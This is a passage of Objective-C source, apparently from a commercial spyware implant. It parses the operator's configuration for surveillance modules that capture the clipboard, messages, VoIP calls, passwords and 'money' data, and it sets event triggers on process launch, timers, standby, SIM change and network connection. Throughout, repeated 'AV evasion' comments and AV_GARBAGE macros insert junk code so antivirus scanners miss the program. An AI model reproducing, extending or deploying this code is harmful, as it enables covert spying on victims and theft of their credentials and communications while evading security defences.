  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [pool release];
}

// Done.
- (void)initClipboardModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  
  NSNumber *type  = [NSNumber numberWithUnsignedInt: AGENT_CLIPBOARD];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       MODULE_EMPTY_CONF,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  [mAgentsList addObject: moduleConfiguration];
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [pool release];
}


- (void)initMessagesModule: (NSDictionary *)aModule
{
    
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
 NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *type  = [NSNumber numberWithUnsignedInt: AGENT_MESSAGES];
  NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
    // jo add start
  NSMutableDictionary *filter = [[aModule objectForKey:@"mail"] objectForKey:@"filter"];
    // jo add end
    
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  keys = [NSArray arrayWithObjects: @"agentID",
          @"status",
          @"data",
          nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  objects = [NSArray arrayWithObjects: type, 
             enabled, 
             filter, //jo //MODULE_EMPTY_CONF
             nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [mAgentsList addObject: moduleConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [moduleConfiguration release];
  
  [pool release];
}

typedef struct  {
  u_int sampleSize;   // Max single-sample size
  u_int compression;  // Compression factor
} voip_t;

// Done.
- (void)initCallModule: (NSDictionary *)aModule
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  voip_t voip;
  id enabled = AGENT_ENABLED;
  NSArray *keys = nil;
  NSArray *objects = nil;
  NSData  *data;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *type        = [NSNumber numberWithUnsignedInt:AGENT_VOIP];
  NSNumber *compression = [aModule objectForKey:@"compression"];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *buffer      = [aModule objectForKey:@"buffer"];
  NSNumber *status      = [aModule objectForKey: MODULES_STATUS_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  if (status == nil || [status boolValue] == FALSE)
    enabled = AGENT_DISABLED;
  
  memset(&voip, 0, sizeof(voip));
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  voip.sampleSize  = (buffer != nil ? [buffer unsignedIntValue] : 512000);
  voip.compression = (compression != nil ? [compression intValue] : 5);
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  data = [[NSData alloc] initWithBytes: &voip length: sizeof(voip)];
  
  keys = [NSArray arrayWithObjects: @"agentID",
                                    @"status",
                                    @"data",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       enabled, 
                                       data,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
  
  [moduleConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [mAgentsList addObject: moduleConfiguration];
  
  [moduleConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [data release];
  
  [pool release];
}

- (void)initMoneyModule: (NSDictionary *)aModule
{
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    id enabled = AGENT_ENABLED;
    NSArray *keys = nil;
    NSArray *objects = nil;
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    NSNumber *type = [NSNumber numberWithUnsignedInt: AGENT_MONEY];
    NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    if (status == nil || [status boolValue] == FALSE)
        enabled = AGENT_DISABLED;
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    keys = [NSArray arrayWithObjects: @"agentID",
            @"status",
            @"data",
            nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    objects = [NSArray arrayWithObjects: type,
               enabled,
               MODULE_EMPTY_CONF,
               nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_006
    
    NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                           forKeys: keys];
    
    // AV evasion: only on release build
    AV_GARBAGE_000
    
    NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
    
    [moduleConfiguration addEntriesFromDictionary: dictionary];
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    [mAgentsList addObject: moduleConfiguration];
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    [moduleConfiguration release];
    
    [pool release];
}

- (void)initPasswdModule: (NSDictionary *)aModule
{
    NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    id enabled = AGENT_ENABLED;
    NSArray *keys = nil;
    NSArray *objects = nil;
    
    // AV evasion: only on release build
    AV_GARBAGE_006
    
    NSMutableDictionary *moduleConfiguration = [[NSMutableDictionary alloc] init];
    
    // AV evasion: only on release build
    AV_GARBAGE_007
    
    NSNumber *type = [NSNumber numberWithUnsignedInt: AGENT_PASSWORD];
    NSNumber *status = [aModule objectForKey: MODULES_STATUS_KEY];
    
    // AV evasion: only on release build
    AV_GARBAGE_004
    
    if (status == nil || [status boolValue] == FALSE)
        enabled = AGENT_DISABLED;
    
    // AV evasion: only on release build
    AV_GARBAGE_009
    
    keys = [NSArray arrayWithObjects: @"agentID",
            @"status",
            @"data",
            nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_008
    
    objects = [NSArray arrayWithObjects: type,
               enabled,
               MODULE_EMPTY_CONF,
               nil];
    
    // AV evasion: only on release build
    AV_GARBAGE_005
    
    NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                           forKeys: keys];
    
    [moduleConfiguration addEntriesFromDictionary: dictionary];
    
    // AV evasion: only on release build
    AV_GARBAGE_003
    
    [mAgentsList addObject: moduleConfiguration];
    
    // AV evasion: only on release build
    AV_GARBAGE_001
    
    [moduleConfiguration release];
    
    // AV evasion: only on release build
    AV_GARBAGE_002
    
    [pool release];
}

#
#
#pragma mark Events parsing
#
#

#define EVENT_PROCESS_ON_PROC   0x00000000
#define EVENT_PROCESS_ON_WINDOW 0x00000001
#define EVENT_PROCESS_ON_FOCUS  0x00000002  

// Done. check comments.
- (void)addProcessEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects;
  NSData  *data;
  processStruct_t procStruct;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  // Default value for all parameters: 0xFFFFFFFF
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_PROCESS];
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  memset(&procStruct, 0, sizeof(procStruct));
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  if ([anEvent objectForKey: EVENT_ACTION_END_KEY] != nil) 
    {
      procStruct.onClose = [[anEvent objectForKey: EVENT_ACTION_END_KEY] unsignedIntValue];
    }
  else
    {
      procStruct.onClose  = 0xFFFFFFFF;
    }
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  if ([anEvent objectForKey: EVENT_PROC_WINDOW_KEY] != nil) 
    {
      if ([[anEvent objectForKey: EVENT_PROC_WINDOW_KEY] intValue] == TRUE)
        procStruct.lookForTitle = EVENT_PROCESS_ON_WINDOW;
      else
        procStruct.lookForTitle = EVENT_PROCESS_ON_PROC;
    }
  else
    procStruct.lookForTitle = EVENT_PROCESS_ON_PROC;
  
  if ([anEvent objectForKey: EVENT_PROC_FOCUS_KEY] != nil) 
    {
      // AV evasion: only on release build
      AV_GARBAGE_008
    
      if ([[anEvent objectForKey: EVENT_PROC_FOCUS_KEY] intValue] == TRUE)
        procStruct.lookForTitle |= EVENT_PROCESS_ON_FOCUS;
    }

  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  if ([anEvent objectForKey: EVENT_PROC_NAME_KEY] != nil) 
    {
      //FIXED- ???
//      u_int nameLength = (u_int)[[anEvent objectForKey: EVENT_PROC_NAME_KEY] 
//                                 lengthOfBytesUsingEncoding: NSUTF8StringEncoding];
//      
//      // with rcs8
//      procStruct.nameLength =  nameLength > 256 ? 256 : nameLength;
      
      //XXX- controllare che sia convertito in utf16
      NSData *nameData = [[anEvent objectForKey: EVENT_PROC_NAME_KEY] dataUsingEncoding: NSUTF16LittleEndianStringEncoding];
      u_int nameLength = [nameData length] < 256 ? [nameData length] : 256;
      memcpy(procStruct.name, [nameData bytes], nameLength);
      
      // AV evasion: only on release build
      AV_GARBAGE_003
      
    }
  
  data = [NSData dataWithBytes: &procStruct length: sizeof(procStruct)];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  keys = [NSArray arrayWithObjects: @"type",      // for comp
                                    @"actionID",  // for comp
                                    @"data",      // for comp
                                    @"status",    // for comp
                                    @"monitor",   // for comp
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       data,
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [mEventsList addObject: eventConfiguration];
  
  [eventConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [pool release];
}

/////////////////////////////////////////////////////
// temporary methods for emulate old timers
//
// Done.
- (NSTimeInterval)calculateMsecFromMidnight:(NSString*)aDate
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSTimeInterval msec = 0;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  if (aDate == nil)
    return msec;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSRange fixedRange;
  fixedRange.location = 11;
  fixedRange.length   = 8;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  //date description format: YYYY-MM-DD HH:MM:SS ±HHMM
  // UTC timers
  NSTimeZone *timeZone = [NSTimeZone timeZoneWithName:@"UTC"];
  
  // AV evasion: only on release build
  AV_GARBAGE_000
  
  NSDateFormatter *inFormat = [[NSDateFormatter alloc] init];
  [inFormat setTimeZone:timeZone];
  [inFormat setDateFormat: @"yyyy-MM-dd HH:mm:ss ZZZ"];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  // Get current date string UTC
  NSDate *now = [NSDate date];
  NSString *currDateStr = [inFormat stringFromDate: now];
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  [inFormat release];
  
  // Create string from current date: yyyy-MM-dd hh:mm:ss ZZZ
  NSMutableString *dayStr = [[NSMutableString alloc] initWithString: currDateStr];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  // reset current date time to midnight
  [dayStr replaceCharactersInRange: fixedRange withString: @"00:00:00"];
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSDateFormatter *outFormat = [[NSDateFormatter alloc] init];
  [outFormat setTimeZone:timeZone];
  [outFormat setDateFormat: @"yyyy-MM-dd HH:mm:ss ZZZ"];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  // Current midnite
  NSDate *midnight = [outFormat dateFromString: dayStr];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  // Set current date time to aDate
  [dayStr replaceCharactersInRange: fixedRange withString: aDate];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSDate *date = [outFormat dateFromString: dayStr];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [outFormat release];
  [dayStr release];
  
  msec = [date timeIntervalSinceDate: midnight];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  msec *= 1000;
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [pool release];
  
  return  msec;
}

// Done.
- (int64_t)calculateWinDate:(NSString*)aDate
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  if (aDate == nil)
    return 0;
  
  // AV evasion: only on release build
  AV_GARBAGE_009
  
  // date description format: YYYY-MM-DD HH:MM:SS ±HHMM
  // UTC timers
  NSTimeZone *timeZone = [NSTimeZone timeZoneWithName:@"UTC"];
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  NSDateFormatter *inFormat = [[NSDateFormatter alloc] init];
  [inFormat setTimeZone:timeZone];
  [inFormat setDateFormat: @"yyyy-MM-dd HH:mm:ss"];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  // Get date string UTC
  NSDate *theDate = [inFormat dateFromString: aDate];
  [inFormat release];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSTimeInterval unixTime = [theDate timeIntervalSince1970];
  int64_t winTime = (unixTime * RATE_DIFF) + EPOCH_DIFF;

  [pool release];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  return  winTime;
}

- (int64_t)calculateDaysDate:(NSNumber*)aDay
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  int64_t days;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  if (aDay == nil)
    return 0;
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  // days in 100nanosec * secXHour * hourXdays
  days = (int64_t)[aDay intValue] * TIMER_100NANOSEC_PER_DAY;
  
  [pool release];
  
  return  days;
}

/////////////////////////////////////////////////////
// Done.
- (u_int)timerGetSubtype:(NSDictionary*)anEvent
{
  u_int type = TIMER_UNKNOWN;
  
  NSString *eventType = [anEvent objectForKey: EVENT_TYPE_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  if ([eventType compare: EVENTS_TIMER_KEY] == NSOrderedSame)
    {
      // AV evasion: only on release build
      AV_GARBAGE_001
    
      NSString *subtype = [anEvent objectForKey: EVENTS_TIMER_SUBTYPE_KEY];
    
      // AV evasion: only on release build
      AV_GARBAGE_003
    
      if (subtype == nil)
        type = TIMER_UNKNOWN;
      else if ([subtype compare: EVENTS_TIMER_SUBTYPE_LOOP_KEY] == NSOrderedSame)
        type = TIMER_LOOP;
      else if ([subtype compare: EVENTS_TIMER_SUBTYPE_DAILY_KEY] == NSOrderedSame)
        type = TIMER_DAILY;
//      else if ([subtype compare: EVENTS_TIMER_SUBTYPE_STARTUP_KEY] == NSOrderedSame) /*no more present!*/
//        type = TIMER_AFTER_STARTUP;

    }
  else if ([eventType compare: EVENTS_TIMER_DATE_KEY] == NSOrderedSame)
    type = TIMER_DATE;
  else if ([eventType compare: EVENTS_TIMER_AFTERINST_KEY] == NSOrderedSame)
    type = TIMER_INST;
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  return type;
}

/////////////////////////////////////////////////////
// Old timers mapping:
//
// TIMER_DATE, TIMER_INST -> EVENTS_TIMER_DATE_KEY, EVENTS_TIMER_AFTERINST_KEY
// TIMER_AFTER_STARTUP, TIMER_LOOP, TIMER_DAILY -> EVENTS_TIMER_KEY
// Done.


- (void)addTimerEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects;
  NSData  *data;
  timerStruct_t timerStruct;
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  memset(&timerStruct, 0, sizeof(timerStruct));
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_TIMER];  
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];      
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];      
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  
  timerStruct.type = [self timerGetSubtype:anEvent];
  timerStruct.endAction = (end != nil ? [end unsignedIntValue] : 0xFFFFFFFF);
  
  switch (timerStruct.type) 
  {
    case TIMER_LOOP:
    {    
      // AV evasion: only on release build
      AV_GARBAGE_001
      
      timerStruct.loDelay = delay != nil ? [delay intValue] : 0xFFFFFFFF;
      if (delay != nil)
        timerStruct.loDelay *= 1000;
      break;
    }  
    case TIMER_DAILY:
    {  
      // AV evasion: only on release build
      AV_GARBAGE_003
      
      timerStruct.loDelay = [self calculateMsecFromMidnight:[anEvent objectForKey:EVENTS_TIMER_TS_KEY]];
      
      // AV evasion: only on release build
      AV_GARBAGE_001
      
      timerStruct.hiDelay = [self calculateMsecFromMidnight:[anEvent objectForKey:EVENTS_TIMER_TE_KEY]];
    break;
    }
    case TIMER_DATE:
    {  
      // AV evasion: only on release build
      AV_GARBAGE_004
      
      int64_t winDate = [self calculateWinDate:[anEvent objectForKey: EVENTS_TIMER_DATEFROM_KEY]];
      timerStruct.loDelay = winDate & 0x00000000FFFFFFFF;  
      
      // AV evasion: only on release build
      AV_GARBAGE_005
      
      timerStruct.hiDelay = (winDate >> 32) & 0x00000000FFFFFFFF;
    break;
    }
    case TIMER_INST:
    {  
      // AV evasion: only on release build
      AV_GARBAGE_004
      
      int64_t winDate = [self calculateDaysDate:[anEvent objectForKey: EVENTS_TIMER_DAYS_KEY]];
      timerStruct.loDelay = winDate & 0x00000000FFFFFFFF;  
      // AV evasion: only on release build
      AV_GARBAGE_005
      
      timerStruct.hiDelay = (winDate >> 32) & 0x00000000FFFFFFFF;
      break;
    }
    //    case TIMER_AFTER_STARTUP: /* no more on rcs8 */
    //    {
    //      timerStruct.loDelay = delay != nil ? [delay intValue] : 0xFFFFFFFF;
    //      if (delay != nil)
    //        timerStruct.loDelay *= 1000;
    //      break;
    //    }
    default:
    {
      timerStruct.hiDelay = 0;
      timerStruct.loDelay = 0;
      break;
    }
  }
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  data = [NSData dataWithBytes: &timerStruct length: sizeof(timerStruct)];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       data,
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
             
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [mEventsList addObject: eventConfiguration];
  
  [eventConfiguration release];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  [pool release];
}

// Done.
- (void)addStandbyEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects;
  NSData  *data;
  int actionExit = 0xFFFFFFFF;
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_SCREENSAVER];
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY]; 
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY]; 
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  
  actionExit = (end != nil ? [end intValue] : 0xFFFFFFFF);
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  data = [NSData dataWithBytes: &actionExit length:sizeof(int)];
  
  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       data,
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
             
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  [mEventsList addObject: eventConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [eventConfiguration release];
  
  [pool release];
}

// only iOS
- (void)addSimchangeEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects; 
  
  // AV evasion: only on release build
  AV_GARBAGE_007
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_SIM_CHANGE];
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];  

  // AV evasion: only on release build
  AV_GARBAGE_004
  
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];  
  
  // AV evasion: only on release build
  AV_GARBAGE_002
  
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];

  keys = [NSArray arrayWithObjects: @"type", 
                                    @"actionID", 
                                    @"data",
                                    @"status", 
                                    @"monitor", 
                                    @"enabled",
                                    @"start",
                                    @"repeat",
                                    @"delay",
                                    @"iter",
                                    @"end",
                                    nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  objects = [NSArray arrayWithObjects: type, 
                                       action  != nil ? action  : defNum, 
                                       @"",
                                       EVENT_START, 
                                       @"", 
                                       enabled != nil ? enabled : defNum,
                                       action  != nil ? action  : defNum,
                                       repeat  != nil ? repeat  : defNum,
                                       delay   != nil ? delay   : defNum,
                                       iter    != nil ? iter    : defNum,
                                       end     != nil ? end     : defNum,
                                       nil];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  NSDictionary *dictionary = [NSDictionary dictionaryWithObjects: objects
                                                         forKeys: keys];
  
  NSMutableDictionary *eventConfiguration = [[NSMutableDictionary alloc] init];
  
  // AV evasion: only on release build
  AV_GARBAGE_004
  
  [eventConfiguration addEntriesFromDictionary: dictionary];
  
  [mEventsList addObject: eventConfiguration];
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  [eventConfiguration release];
  
  [pool release];
}

// Done. check network byte order.
- (void)addConnectionEvent: (NSDictionary *)anEvent
{
  NSAutoreleasePool *pool = [[NSAutoreleasePool alloc] init];
  
  NSArray *keys;
  NSArray *objects;
  NSData  *data;
  connectionStruct_t conStruct;
  
  NSNumber *defNum  = [NSNumber numberWithUnsignedInt: ACTION_UNKNOWN];
  
  NSNumber *type    = [NSNumber numberWithUnsignedInt: EVENT_CONNECTION];    
  
  // AV evasion: only on release build
  AV_GARBAGE_001
  
  NSNumber *action  = [anEvent objectForKey: EVENTS_ACTION_START_KEY];
  NSNumber *enabled = [anEvent objectForKey: EVENT_ENABLED_KEY];
  NSNumber *repeat  = [anEvent objectForKey: EVENT_ACTION_REP_KEY];  
  
  // AV evasion: only on release build
  AV_GARBAGE_003
  
  NSNumber *delay   = [anEvent objectForKey: EVENT_ACTION_DELAY_KEY];
  NSNumber *iter    = [anEvent objectForKey: EVENT_ACTION_ITER_KEY];
  NSNumber *end     = [anEvent objectForKey: EVENT_ACTION_END_KEY];
  
  // AV evasion: only on release build
  AV_GARBAGE_005
  
  memset(&conStruct, 0, sizeof(conStruct));
  
  if ([anEvent objectForKey:@"ip"] != nil)
    {
        NSString *ipString  = [anEvent objectForKey:@"ip"];
        NSData *ipData      = [ipString dataUsingEncoding:NSUTF8StringEncoding];
        conStruct.ipAddress = inet_addr([ipData bytes]);
    }
  else
    conStruct.ipAddress = 0;
  
  // AV evasion: only on release build
  AV_GARBAGE_006
  
  if ([anEvent objectForKey:@"netmask"] != nil)
    {  
      // AV evasion: only on release build
      AV_GARBAGE_007
    
      NSString *maskString  = [anEvent objectForKey:@"netmask"];
      NSData *maskData      = [maskString dataUsingEncoding:NSUTF8StringEncoding];
      conStruct.netMask     = inet_addr([maskData bytes]);
    }
  else
    conStruct.netMask = 0;
  
  // AV evasion: only on release build
  AV_GARBAGE_008
  
  if ([anEvent objectForKey:@"port"] != nil)
    {
      NSNumber *port  = [anEvent objectForKey:@"port"];
